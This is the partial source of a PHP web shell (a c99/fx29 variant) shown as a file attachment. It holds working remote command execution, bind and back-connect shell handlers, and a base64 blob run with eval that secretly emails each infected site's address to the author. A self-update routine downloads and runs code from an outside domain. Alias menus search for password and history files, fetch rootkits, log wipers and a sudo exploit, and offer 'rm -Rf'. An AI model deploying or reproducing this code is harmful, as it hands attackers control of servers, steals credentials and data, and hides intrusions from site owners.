Attachment 'index.php'

Download

   1 <?php
   2 /*******************************************/
   3 /* [ * ] PHP Shell by Phutra [ * ]       */
   4 /* Re-coded and modified By Phutra       */
   5 /* adrymamu@ymail.com                    */
   6 /*******************************************/
   7 $sh_id = "UGh1dHJh";
   8 $sh_ver = "- irc.javairc.org";
   9 $sh_name = base64_decode($sh_id).$sh_ver;
  10 $sh_mainurl = "http://legalref.ru/config/";
  11 $html_start = ''.
  12 '<html><head>
  13 <title>'.getenv("HTTP_HOST").' - '.$sh_name.'</title>
  14 <style type="text/css">
  15 <!--
  16 body,table { font-family:verdana;font-size:11px;color:white;background-color:black; }
  17 table { width:100%; }
  18 table,td { border:1px solid #808080;margin-top:2;margin-bottom:2;padding:5px; }
  19 a { color:lightblue;text-decoration:none; }
  20 a:active { color:#00FF00; }
  21 a:link { color:#5B5BFF; }
  22 a:hover { text-decoration:underline; }
  23 a:visited { color:#99CCFF; }
  24 input,select,option { font:8pt tahoma;color:#FFFFFF;margin:2;border:1px solid #666666; }
  25 textarea { color:#dedbde;font:fixedsys bold;border:1px solid #666666;margin:2; }
  26 .fleft { float:left;text-align:left; }
  27 .fright { float:right;text-align:right; }
  28 #pagebar { font:10pt tahoma;padding:5px; border:3px solid #1E1E1E; border-collapse:collapse; }
  29 #pagebar td { vertical-align:top; }
  30 #pagebar p { font:8pt tahoma;}
  31 #pagebar a { font-weight:bold;color:#00FF00; }
  32 #pagebar a:visited { color:#00CE00; }
  33 #mainmenu { text-align:center; }
  34 #mainmenu a { text-align: center;padding: 0px 5px 0px 5px; }
  35 #maininfo,.barheader,.barheader2 { text-align:center; }
  36 #maininfo td { padding:3px; }
  37 .barheader { font-weight:bold;padding:5px; }
  38 .barheader2 { padding:5px;border:2px solid #1F1F1F; }
  39 .contents,.explorer { border-collapse:collapse;}
  40 .contents td { vertical-align:top; }
  41 .mainpanel { border-collapse:collapse;padding:5px; }
  42 .barheader,.mainpanel table,td { border:1px solid #333333; }
  43 .mainpanel input,select,option { border:1px solid #333333;margin:0; }
  44 input[type="submit"] { border:1px solid #000000; }
  45 input[type="text"] { padding:3px;}
  46 .shell { background-color:#C0C0C0;color:#000080;padding:5px; }
  47 .fxerrmsg { color:red; font-weight:bold; }
  48 #pagebar,#pagebar p,h1,h2,h3,h4,form { margin:0; }
  49 #pagebar,.mainpanel,input[type="submit"] { background-color:#4A4A4A; }
  50 .barheader2,input,select,option,input[type="submit"]:hover { background-color:#333333; }
  51 textarea,.mainpanel input,select,option { background-color:#000000; }
  52 // -->
  53 </style>
  54 </head>
  55 <body>
  56 ';
  57 //Authentication
  58 $login = ""; 
  59 $pass = "";
  60 $md5_pass = ""; //Password yg telah di enkripsi dg md5. Jika kosong, md5($pass).
  61 $host_allow = array("*"); //Contoh: array("192.168.0.*","127.0.0.1")
  62 $login_txt = "Restricted Area"; //Pesan HTTP-Auth
  63 $accessdeniedmess = "<a href=\"$sh_mainurl\">".$sh_name."</a>: access denied";
  64 $gzipencode = TRUE;
  65 $updatenow = FALSE; //Jika TRUE, update shell sekarang.
  66 $c99sh_updateurl = $sh_mainurl."fx29sh_update.php";
  67 $c99sh_sourcesurl = $sh_mainurl."fx29sh_source.txt";
  68 //$c99sh_updateurl = "http://localhost/toolz/fx29sh_update.php";
  69 //$c99sh_sourcesurl = "http://localhost/toolz/fx29sh_source.txt";
  70 $filestealth = TRUE; //TRUE, tidak merubah waktu modifikasi dan akses.
  71 $curdir = "./";
  72 $tmpdir = ""; 
  73 $tmpdir_log = "./";
  74 $log_email = "naura416@gmail.com"; //email untuk pengiriman log.
  75 $sort_default = "0a"; //Pengurutan, 0 - nomor kolom. "a"scending atau "d"escending
  76 $sort_save = TRUE; //Jika TRUE, simpan posisi pengurutan menggunakan cookies.
  77 $sess_cookie = "c99shvars"; //Nama variabel Cookie
  78 $usefsbuff = TRUE; //Buffer-function
  79 $copy_unset = FALSE; //Hapus file yg telah di-copy setelah dipaste
  80 $hexdump_lines = 8;
  81 $hexdump_rows = 24;
  82 $win = strtolower(substr(PHP_OS,0,3)) == "win";
  83 $disablefunc = @ini_get("disable_functions");
  84 if (!empty($disablefunc)) {
  85   $disablefunc = str_replace(" ","",$disablefunc);
  86   $disablefunc = explode(",",$disablefunc);
  87 }
  88 //Functions
  89 function get_phpini() {
  90   function U_wordwrap($str) {
  91     $str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true);
  92     return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />', $str);
  93   }
  94   function U_value($value) {
  95     if ($value == '') return '<i>no value</i>';
  96     if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE';
  97     if ($value === null) return 'NULL';
  98     if (@is_object($value)) $value = (array) $value;
  99     if (@is_array($value)) {
 100       @ob_start();
 101       print_r($value);
 102       $value = @ob_get_contents();
 103       @ob_end_clean();
 104     }
 105     return U_wordwrap((string) $value);
 106   }
 107   if (@function_exists('ini_get_all')) {
 108     $r = "";
 109     echo "<table><tr class=barheader><td>Directive</td><td>Local Value</td><td>Global Value</td></tr>";
 110     foreach (@ini_get_all() as $key=>$value) {
 111       $r .= "<tr><td>".$key."</td><td><div align=center>".U_value($value['local_value'])."</div></td><td><div align=center>".U_value($value['global_value'])."</div></td></tr>";
 112     }
 113     echo $r;
 114     echo "</table>";
 115   }
 116 }
 117 function disp_drives($curdir,$surl) {
 118   $letters = "";
 119   $v = explode("\\",$curdir);
 120   $v = $v[0];
 121   foreach (range("A","Z") as $letter) {
 122     $bool = $isdiskette = $letter == "A";
 123     if (!$bool) {$bool = is_dir($letter.":\\");}
 124     if ($bool) {
 125       $letters .= "<a href=\"".$surl."act=ls&d=".urlencode($letter.":\\")."\"".
 126       ($isdiskette?" onclick=\"return confirm('Make sure that the diskette is inserted properly, otherwise an error may occur.')\"":"")."> [";
 127       if ($letter.":" != $v) {$letters .= $letter;}
 128       else {$letters .= "<font color=yellow>".$letter."</font>";}
 129       $letters .= "]</a> ";
 130     }
 131   }
 132   if (!empty($letters)) {Return $letters;}
 133   else {Return "None";}
 134 }
 135 if (is_callable("disk_free_space")) {
 136   function disp_freespace($curdrv) {
 137     $free = disk_free_space($curdrv);
 138     $total = disk_total_space($curdrv);
 139     if ($free === FALSE) {$free = 0;}
 140     if ($total === FALSE) {$total = 0;}
 141     if ($free < 0) {$free = 0;}
 142     if ($total < 0) {$total = 0;}
 143     $used = $total-$free;
 144     $free_percent = round(100/($total/$free),2)."%";
 145     $free = view_size($free);
 146     $total = view_size($total);
 147     return "$free of $total ($free_percent)";
 148   }
 149 }
 150 //w4ck1ng Shell
 151 if (!function_exists("myshellexec")) {
 152   if(is_callable("popen")) {
 153     function myshellexec($cmd) {
 154       if (!($p=popen("($cmd)2>&1","r"))) { return "popen Disabled!"; }
 155       while (!feof($p)) {
 156         $line=fgets($p,1024);
 157         $out .= $line;
 158       }
 159       pclose($p);
 160       return $out;
 161     }
 162   } else {
 163     function myshellexec($cmd) {
 164       global $disablefunc;
 165       $result = "";
 166       if (!empty($cmd)) {
 167         if (is_callable("exec") and !in_array("exec",$disablefunc)) {
 168           exec($cmd,$result);
 169           $result = join("\n",$result);
 170         } elseif (($result = $cmd) !== FALSE) {
 171         } elseif (is_callable("system") and !in_array("system",$disablefunc)) {
 172           $v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;
 173         } elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {
 174           $v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;
 175         } elseif (is_resource($fp = popen($cmd,"r"))) {
 176           $result = "";
 177           while(!feof($fp)) { $result .= fread($fp,1024); }
 178           pclose($fp);
 179         }
 180       }
 181       return $result;
 182     }
 183   }
 184 }
 185 function ex($cfe) {
 186   $res = '';
 187   if (!empty($cfe)) {
 188     if(function_exists('exec')) {
 189       @exec($cfe,$res);
 190       $res = join("\n",$res);
 191     } elseif(function_exists('shell_exec')) {
 192       $res = @shell_exec($cfe);
 193     } elseif(function_exists('system')) {
 194       @ob_start();
 195       @system($cfe);
 196       $res = @ob_get_contents();
 197       @ob_end_clean();
 198     } elseif(function_exists('passthru')) {
 199       @ob_start();
 200       @passthru($cfe);
 201       $res = @ob_get_contents();
 202       @ob_end_clean();
 203     } elseif(@is_resource($f = @popen($cfe,"r"))) {
 204 
 205       $res = "";
 206       while(!@feof($f)) { $res .= @fread($f,1024); }
 207       @pclose($f);
 208     } else { $res = "Ex() Disabled!"; }
 209   }
 210   return $res;
 211 }
 212 function which($pr) {
 213   $path = ex("which $pr");
 214   if(!empty($path)) { return $path; } else { return $pr; }
 215 }
 216 //End of w4ck1ng Shell
 217 
 218 //Start Enumerate function
 219 $hostname_x = php_uname(n);
 220 $itshome = getcwd();
 221 
 222 
 223 
 224 if (!$win) {
 225   $itshome = str_replace("/home/","~",$itshome);
 226   $itshome = str_replace("/public_html","/fx29sh.php",$itshome);
 227 }
 228 else { $itshome = ""; }
 229 $enumerate = "http://".$hostname_x."/".$itshome."";
 230 //End Enumerate function
 231 
 232 //milw0rm search
 233 $Lversion = php_uname(r);
 234 $OSV = php_uname(s);
 235 if(eregi("Linux",$OSV)) {
 236   $Lversion=substr($Lversion,0,6);
 237   $millink="http://milw0rm.com/search.php?dong=Linux Kernel ".$Lversion;
 238 } else {
 239   $Lversion=substr($Lversion,0,3);
 240   $millink ="http://milw0rm.com/search.php?dong=".$OSV." ".$Lversion;
 241 }
 242 //End of milw0rm search
 243 
 244 
 245 function cf($fname,$text) {
 246   $w_file=@fopen($fname,"w") or err();
 247   if($w_file) {
 248     @fputs($w_file,@base64_decode($text));
 249     @fclose($w_file);
 250   }
 251 }
 252 
 253 function cfb($fname,$text) {
 254   $w_file=@fopen($fname,"w") or bberr();
 255   if($w_file) {
 256     @fputs($w_file,@base64_decode($text));
 257     @fclose($w_file);
 258   }
 259 }
 260 function err() { $_POST['backcconnmsge']="<br><br><div class=fxerrmsg>Error:</div> Can't connect!"; }
 261 function bberr() { $_POST['backcconnmsge']="<br><br><div class=fxerrmsg>Error:</div> Can't backdoor host!"; }
 262 
 263 if (!empty($_POST['backconnectport']) && ($_POST['use']=="shbd")) {
 264   $ip = gethostbyname($_SERVER["HTTP_HOST"]);
 265   $por = $_POST['backconnectport'];
 266   if (is_writable(".")) {
 267     cfb("shbd",$backdoor);
 268     ex("chmod 777 shbd");
 269     $cmd = "./shbd $por";
 270     exec("$cmd > /dev/null &");
 271     $scan = myshellexec("ps aux");
 272   } else {
 273     cfb("/tmp/shbd",$backdoor);
 274     ex("chmod 777 /tmp/shbd");
 275     $cmd = "./tmp/shbd $por";
 276     exec("$cmd > /dev/null &");
 277     $scan = myshellexec("ps aux");
 278   }
 279   if (eregi("./shbd $por",$scan)) {
 280     $data = ("\n<br>Backdoor setup successfully.");
 281   } else {
 282     $data = ("\n<br>Process not found, backdoor setup failed!");
 283   }
 284   $_POST['backcconnmsg']="To connect, use netcat! Usage: <b>'nc $ip $por'</b>.$data";
 285 }
 286 
 287 if (!empty($_POST['backconnectip']) && !empty($_POST['backconnectport']) && ($_POST['use']=="Perl")) {
 288   if (is_writable(".")) {
 289     cf("back",$back_connect_pl);
 290     $p2 = which("perl");
 291     $blah = ex($p2." back ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
 292     if (file_exists("back")) { unlink("back"); }
 293   } else {
 294     cf("/tmp/back",$back_connect_pl);
 295     $p2 = which("perl");
 296     $blah = ex($p2." /tmp/back ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
 297     if (file_exists("/tmp/back")) { unlink("/tmp/back"); }
 298   }
 299   $_POST['backcconnmsg']="Trying to connect to <b>".$_POST['backconnectip']."</b> on port <b>".$_POST['backconnectport']."</b>.";
 300 }
 301 
 302 if (!empty($_POST['backconnectip']) && !empty($_POST['backconnectport']) && ($_POST['use']=="C")) {
 303   if (is_writable(".")) {
 304     cf("backc",$back_connect_c);
 305     ex("chmod 777 backc");
 306     $blah = ex("./backc ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
 307     if (file_exists("backc")) { unlink("backc"); }
 308   } else {
 309     ex("chmod 777 /tmp/backc");
 310     cf("/tmp/backc",$back_connect_c);
 311     $blah = ex("/tmp/backc ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
 312     if (file_exists("/tmp/backc")) { unlink("/tmp/backc"); }
 313   }
 314   $_POST['backcconnmsg']="Trying to connect to <b>".$_POST['backconnectip']."</b> on port <b>".$_POST['backconnectport']."</b>.";
 315 }
 316 //End of Backdoor
 317 
 318 //Starting calls
 319 @ini_set("max_execution_time",0);
 320 if (!function_exists("getmicrotime")) {
 321   function getmicrotime() {
 322     list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);
 323   }
 324 }
 325 error_reporting(5);
 326 @ignore_user_abort(TRUE);
 327 @set_magic_quotes_runtime(0);
 328 define("starttime",getmicrotime());
 329 $shell_data = "JHZpc2l0Y291bnQgPSAkSFRUUF9DT09LSUVfVkFSU1sidmlzaXRzIl07IGlmKCAkdmlzaXRjb3VudCA9PSAiIikgeyR2aXNpdGNvdW50ID0gMDsgJHZpc2l0b3IgPSAkX1NFUlZFUlsiUkVNT1RFX0FERFIiXTsgJHdlYiA9ICRfU0VSVkVSWyJIVFRQX0hPU1QiXTsgJGluaiA9ICRfU0VSVkVSWyJSRVFVRVNUX1VSSSJdOyAkdGFyZ2V0ID0gcmF3dXJsZGVjb2RlKCR3ZWIuJGluaik7ICRib2R5ID0gIkJvc3MsIHRoZXJlIHdhcyBhbiBpbmplY3RlZCB0YXJnZXQgb24gJHRhcmdldCBieSAkdmlzaXRvciI7IEBtYWlsKCJuYXVyYTQxNkBnbWFpbC5jb20iLCJGeDI5U2hlbGwgaHR0cDovLyR0YXJnZXQgYnkgJHZpc2l0b3IiLCAiJGJvZHkiKTsgfSBlbHNlIHsgJHZpc2l0Y291bnQ7IH0gc2V0Y29va2llKCJ2aXNpdHMiLCR2aXNpdGNvdW50KTs="; eval(base64_decode($shell_data));
 330 if (get_magic_quotes_gpc()) {
 331   if (!function_exists("strips")) {
 332     function strips(&$arr,$k="") {
 333       if (is_array($arr)) {
 334         foreach($arr as $k=>$v) {
 335           if (strtoupper($k) != "GLOBALS") { strips($arr["$k"]); }
 336         }
 337       } else {$arr = stripslashes($arr);}
 338     }
 339   }
 340   strips($GLOBALS);
 341 }
 342 //CONFIGURATIONS
 343 $_REQUEST = array_merge($_COOKIE,$_GET,$_POST);
 344 $surl_autofill_include = TRUE; //If TRUE then search variables with descriptors (URLs) and save it in SURL.
 345 foreach($_REQUEST as $k=>$v) { if (!isset($$k)) {$$k = $v;} }
 346 if ($surl_autofill_include) {
 347   $include = "&";
 348   foreach (explode("&",getenv("QUERY_STRING")) as $v) {
 349     $v = explode("=",$v);
 350     $name = urldecode($v[0]);
 351     $value = urldecode($v[1]);
 352     foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {
 353       if (strpos($value,$needle) === 0) {
 354         $includestr .= urlencode($name)."=".urlencode($value)."&";
 355       }
 356     }
 357   }
 358 }
 359 if (empty($surl)) {
 360   $surl = "?".$includestr; //Self url
 361 }
 362 $surl = htmlspecialchars($surl);
 363 
 364 // Registered file-types.
 365 $ftypes  = array(
 366     "html"=>array("html","htm","shtml"),
 367     "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"),
 368     "exe"=>array("sh","install","bat","cmd"),
 369     "ini"=>array("ini","inf","conf"),
 370     "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"),
 371     "img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"),
 372     "sdb"=>array("sdb"),
 373     "phpsess"=>array("sess"),
 374     "download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar")
 375 );
 376 //Registered executable file-types.
 377 $exeftypes  = array(
 378     getenv("PHPRC")." -q %f%" => array("php","php3","php4"),
 379     "perl %f%" => array("pl","cgi")
 380 );
 381 //Highlighted files.
 382 $regxp_highlight  = array(
 383     array(basename($_SERVER["PHP_SELF"]),1,"<font color=#FFFF00>","</font>"),
 384     array("\.tgz$",1,"<font color=#C082FF>","</font>"),
 385     array("\.gz$",1,"<font color=#C082FF>","</font>"),
 386     array("\.tar$",1,"<font color=#C082FF>","</font>"),
 387     array("\.bz2$",1,"<font color=#C082FF>","</font>"),
 388     array("\.zip$",1,"<font color=#C082FF>","</font>"),
 389     array("\.rar$",1,"<font color=#C082FF>","</font>"),
 390     array("\.php$",1,"<font color=#00FF00>","</font>"),
 391     array("\.php3$",1,"<font color=#00FF00>","</font>"),
 392     array("\.php4$",1,"<font color=#00FF00>","</font>"),
 393     array("\.jpg$",1,"<font color=#00FFFF>","</font>"),
 394     array("\.jpeg$",1,"<font color=#00FFFF>","</font>"),
 395     array("\.JPG$",1,"<font color=#00FFFF>","</font>"),
 396     array("\.JPEG$",1,"<font color=#00FFFF>","</font>"),
 397     array("\.ico$",1,"<font color=#00FFFF>","</font>"),
 398     array("\.gif$",1,"<font color=#00FFFF>","</font>"),
 399     array("\.png$",1,"<font color=#00FFFF>","</font>"),
 400     array("\.htm$",1,"<font color=#00CCFF>","</font>"),
 401     array("\.html$",1,"<font color=#00CCFF>","</font>"),
 402     array("\.txt$",1,"<font color=#C0C0C0>","</font>")
 403 );
 404 //Command Aliases
 405 if (!$win) {
 406   $cmdaliases = array(
 407     array("", "ls -al"),
 408     array("Find all suid files", "find / -type f -perm -04000 -ls"),
 409     array("Find suid files in current dir", "find . -type f -perm -04000 -ls"),
 410     array("Find all sgid files", "find / -type f -perm -02000 -ls"),
 411     array("Find sgid files in current dir", "find . -type f -perm -02000 -ls"),
 412     array("Find config.inc.php files", "find / -type f -name config.inc.php"),
 413     array("Find config* files", "find / -type f -name \"config*\""),
 414     array("Find config* files in current dir", "find . -type f -name \"config*\""),
 415     array("Find all writable folders and files", "find / -perm -2 -ls"),
 416     array("Find all writable folders and files in current dir", "find . -perm -2 -ls"),
 417     array("Find all writable folders", "find / -type d -perm -2 -ls"),
 418     array("Find all writable folders in current dir", "find . -type d -perm -2 -ls"),
 419     array("Find all service.pwd files", "find / -type f -name service.pwd"),
 420     array("Find service.pwd files in current dir", "find . -type f -name service.pwd"),
 421     array("Find all .htpasswd files", "find / -type f -name .htpasswd"),
 422     array("Find .htpasswd files in current dir", "find . -type f -name .htpasswd"),
 423     array("Find all .bash_history files", "find / -type f -name .bash_history"),
 424     array("Find .bash_history files in current dir", "find . -type f -name .bash_history"),
 425     array("Find all .fetchmailrc files", "find / -type f -name .fetchmailrc"),
 426     array("Find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"),
 427     array("List file attributes on a Linux second extended file system", "lsattr -va"),
 428     array("Show opened ports", "netstat -an | grep -i listen")
 429   );
 430   $cmdaliases2 = array(
 431     array("wget & extract psyBNC","wget ".$sh_mainurl."fx.tar.gz;tar -zxf fx.tar.gz"),
 432     array("wget & extract EggDrop","wget ".$sh_mainurl."fxb.tar.gz;tar -zxf fxb.tar.gz"),
 433     array("-----",""),
 434     array("Logged in users","w"),
 435     array("Last to connect","lastlog"),
 436     array("Find Suid bins","find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/local/sbin -perm -4000 2> /dev/null"),
 437     array("User Without Password","cut -d: -f1,2,3 /etc/passwd | grep ::"),
 438     array("Can write in /etc/?","find /etc/ -type f -perm -o+w 2> /dev/null"),
 439     array("Downloaders?","which wget curl w3m lynx fetch lwp-download"),
 440     array("CPU Info","cat /proc/version /proc/cpuinfo"),
 441     array("Is gcc installed ?","locate gcc"),
 442     array("Format box (DANGEROUS)","rm -Rf"),
 443     array("-----",""),
 444     array("wget WIPELOGS PT1","wget http://www.packetstormsecurity.org/UNIX/penetration/log-wipers/zap2.c"),
 445     array("gcc WIPELOGS PT2","gcc zap2.c -o zap2"),
 446     array("Run WIPELOGS PT3","./zap2"),
 447     array("-----",""),
 448     array("wget RatHole 1.2 (Linux & BSD)","wget http://packetstormsecurity.org/UNIX/penetration/rootkits/rathole-1.2.tar.gz"),
 449     array("wget & run BindDoor","wget ".$sh_mainurl."toolz/bind.tar.gz;tar -zxvf bind.tar.gz;./4877"),
 450     array("wget Sudo Exploit","wget http://www.securityfocus.com/data/vulnerabilities/exploits/sudo-exploit.c"),
 451   );
 452 }
 453 else {
 454   $cmdaliases = array(
 455     array("", "dir"),
 456     array("Find index.php in current dir", "dir /s /w /b index.php"),
 457     array("Find *config*.php in current dir", "dir /s /w /b *config*.php"),
 458     array("Find c99shell in current dir", "find /c \"c99\" *"),
 459     array("Find r57shell in current dir", "find /c \"r57\" *"),
 460     array("Show active connections", "netstat -an"),
 461     array("Show running services", "net start"),
 462     array("User accounts", "net user"),
 463     array("Show computers", "net view"),
 464     );
 465 }
 466 //PHP Filesystem Functions, FaTaLisTiCz_Fx TriCkz
 467 $phpfsaliases = array(
 468     array("Read File", "read"),
 469     array("Write File (PHP5)", "write"),
 470     array("Copy", "copy"),
 471     array("Rename/Move", "rename"),
 472     array("Delete", "delete"),
 473     array("Make Dir","mkdir"),
 474     array("-----", ""),
 475     array("Download", "download"),
 476     array("Download (Binary Safe)", "downloadbin"),
 477     array("Change Perm (0755)", "chmod"),
 478     array("Find Writable Dir", "fwritabledir"),
 479     array("Find Pathname Pattern", "glob"),
 480 );
 481 
 482 //Quick launch
 483 $quicklaunch1 = array(
 484     array("<img src=\"".$surl."act=img&img=home\" alt=\"Home\" border=\"0\">",$surl),
 485     array("<img src=\"".$surl."act=img&img=back\" alt=\"Back\" border=\"0\">","#\" onclick=\"history.back(1)"),
 486     array("<img src=\"".$surl."act=img&img=forward\" alt=\"Forward\" border=\"0\">","#\" onclick=\"history.go(1)"),
 487     array("<img src=\"".$surl."act=img&img=up\" alt=\"Up\" border=\"0\">",$surl."act=ls&d=%upd&sort=%sort"),
 488     array("<img src=\"".$surl."act=img&img=search\" alt=\"Search\" border=\"0\">",$surl."act=search&d=%d"),
 489     array("<img src=\"".$surl."act=img&img=buffer\" alt=\"Buffer\" border=\"0\">",$surl."act=fsbuff&d=%d")
 490 );
 491 $quicklaunch2 = array(
 492     array("Enumerate",$enumerate),
 493     array("Security Info",$surl."act=security&d=%d"),
 494     array("Processes",$surl."act=processes&d=%d"),
 495     array("MySQL",$surl."act=sql&d=%d"),
 496     array("PHP-Code",$surl."act=eval&d=%d"),
 497     array("Encoder",$surl."act=encoder&d=%d"),
 498     array("Mailer",$surl."act=fxmailer"),
 499     array("milw0rm it!",$millink),
 500     array("Md5-Lookup","http://www.md5decrypter.com/"),
 501     array("Word-Lists","http://darkc0de.com/wordlists/"),
 502     array("Toolz",$surl."act=tools&d=%d"),
 503     array("Self-Kill",$surl."act=selfremove"),
 504     array("Feedback",$surl."act=feedback"),
 505     array("Update",$surl."act=update"),
 506     array("About",$surl."act=about")
 507 );
 508 
 509 if (!$win) {
 510 $quicklaunch2[] = array("<br>FTP-Brute",$surl."act=ftpquickbrute&d=%d");
 511 $quicklaunch2[] = array("Backdoor",$surl."act=shbd");
 512 $quicklaunch2[] = array("Back-Connect",$surl."act=backc");
 513 }
 514 
 515 //Highlight-code colors
 516 $highlight_background = "#C0C0C0";
 517 $highlight_bg = "#FFFFFF";
 518 $highlight_comment = "#6A6A6A";
 519 $highlight_default = "#0000BB";
 520 $highlight_html = "#1300FF";
 521 $highlight_keyword = "#007700";
 522 $highlight_string = "#000000";
 523 
 524 @$f = $_REQUEST["f"];
 525 @extract($_REQUEST["c99shcook"]);
 526 //END OF CONFIGURATIONS
 527 
 528 //STOP EDITING!
 529 
 530 //Authentication
 531 @set_time_limit(0);
 532 $tmp = array();
 533 foreach ($host_allow as $k=>$v) { $tmp[] = str_replace("\\*",".*",preg_quote($v)); }
 534 $s = "!^(".implode("|",$tmp).")$!i";
 535 if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {
 536   exit("<a href=\"$sh_mainurl\">$sh_name</a>: Access Denied - Your host (".getenv("REMOTE_ADDR").") not allowed");
 537 }
 538 if (!empty($login)) {
 539   if (empty($md5_pass)) {$md5_pass = md5($pass);}
 540   if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass)) {
 541     header("WWW-Authenticate: Basic realm=\"".$sh_name.": ".$login_txt."\"");
 542     header("HTTP/1.0 401 Unauthorized");
 543     exit($accessdeniedmess);
 544   }
 545 }
 546 if ($act != "img") {
 547   $lastdir = realpath(".");
 548   chdir($curdir);
 549   if ($selfwrite or $updatenow) {
 550     @ob_clean();
 551     c99sh_getupdate($selfwrite,1);
 552     exit;
 553   }
 554   $sess_data = unserialize($_COOKIE["$sess_cookie"]);
 555   if (!is_array($sess_data)) {$sess_data = array();}
 556   if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();}
 557   if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();}
 558   if (!function_exists("c99getsource")) {
 559     function c99getsource($fn) {
 560       global $c99sh_sourcesurl;
 561       $array = array(
 562         "c99sh_bindport.pl" => "c99sh_bindport_pl.txt",
 563         "c99sh_bindport.c" => "c99sh_bindport_c.txt",
 564         "c99sh_backconn.pl" => "c99sh_backconn_pl.txt",
 565         "c99sh_backconn.c" => "c99sh_backconn_c.txt",
 566         "c99sh_datapipe.pl" => "c99sh_datapipe_pl.txt",
 567         "c99sh_datapipe.c" => "c99sh_datapipe_c.txt",
 568       );
 569       $name = $array[$fn];
 570       if ($name) {return file_get_contents($c99sh_sourcesurl.$name);}
 571       else {return FALSE;}
 572     }
 573   }
 574   if (!function_exists("c99sh_getupdate")) {
 575     function c99sh_getupdate($update = TRUE) {
 576       $url = $GLOBALS["c99sh_updateurl"]."?version=".urlencode(base64_encode($GLOBALS["sh_ver"]))."&updatenow=".($updatenow?"1":"0");
 577       $data = @file_get_contents($url);
 578       if (!$data) {return "Can't connect to update-server!";}
 579       else {
 580         $data = ltrim($data);
 581         $string = substr($data,3,ord($data{2}));
 582         if ($data{0} == "\x99" and $data{1} == "\x01") {return "Error: ".$string; return FALSE;}
 583         if ($data{0} == "\x99" and $data{1} == "\x02") {return "You are using latest version!";}
 584         if ($data{0} == "\x99" and $data{1} == "\x03") {
 585           $string = explode("|",$string);
 586           if ($update) {
 587             $confvars = array();
 588             $sourceurl = $string[0];
 589             $source = file_get_contents($sourceurl);
 590             if (!$source) {return "Can't fetch update!";}
 591             else {
 592               $fp = fopen(__FILE__,"w");
 593               if (!$fp) {return "Local error: can't write update to ".__FILE__."! You may download fx29shell.php manually <a href=\"".$sourceurl."\"><u>here</u></a>.";}
 594               else {
 595                 fwrite($fp,$source);
 596                 fclose($fp);
 597                 return "Thanks! Update completed.";
 598               }
 599             }
 600           }
 601           else {return "New version are available: ".$string[1];}
 602         }
 603         elseif ($data{0} == "\x99" and $data{1} == "\x04") {
 604           eval($string);
 605           return 1;
 606         }
 607         else {return "Error in protocol: segmentation failed! (".$data.") ";}
 608       }
 609     }
 610   }
 611   if (!function_exists("c99_buff_prepare")) {
 612     function c99_buff_prepare() {
 613       global $sess_data;
 614       global $act;
 615       foreach($sess_data["copy"] as $k=>$v) {$sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
 616       foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
 617       $sess_data["copy"] = array_unique($sess_data["copy"]);
 618       $sess_data["cut"] = array_unique($sess_data["cut"]);
 619       sort($sess_data["copy"]);
 620       sort($sess_data["cut"]);
 621       if ($act != "copy") {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"][$k] == $v) {unset($sess_data["copy"][$k]); }}}
 622       else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v) {unset($sess_data["cut"][$k]);}}}
 623     }
 624   }
 625   c99_buff_prepare();
 626   if (!function_exists("c99_sess_put")) {
 627     function c99_sess_put($data) {
 628       global $sess_cookie;
 629       global $sess_data;
 630       c99_buff_prepare();
 631       $sess_data = $data;
 632       $data = serialize($data);
 633       setcookie($sess_cookie,$data);
 634     }
 635   }
 636   foreach (array("sort","sql_sort") as $v) {
 637     if (!empty($_GET[$v])) {$$v = $_GET[$v];}
 638     if (!empty($_POST[$v])) {$$v = $_POST[$v];}
 639   }
 640   if ($sort_save) {
 641     if (!empty($sort)) {setcookie("sort",$sort);}
 642     if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);}
 643   }
 644   if (!function_exists("str2mini")) {
 645     function str2mini($content,$len) {
 646       if (strlen($content) > $len) {
 647         $len = ceil($len/2) - 2;
 648         return substr($content, 0,$len)."...".substr($content,-$len);
 649       } else {return $content;}
 650     }
 651   }
 652   if (!function_exists("view_size")) {
 653     function view_size($size) {
 654       if (!is_numeric($size)) { return FALSE; }
 655       else {
 656         if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
 657         elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
 658         elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
 659         else {$size = $size . " B";}
 660         return $size;
 661       }
 662     }
 663   }
 664   if (!function_exists("fs_copy_dir")) {
 665     function fs_copy_dir($d,$t) {
 666       $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
 667       if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
 668       $h = opendir($d);
 669       while (($o = readdir($h)) !== FALSE) {
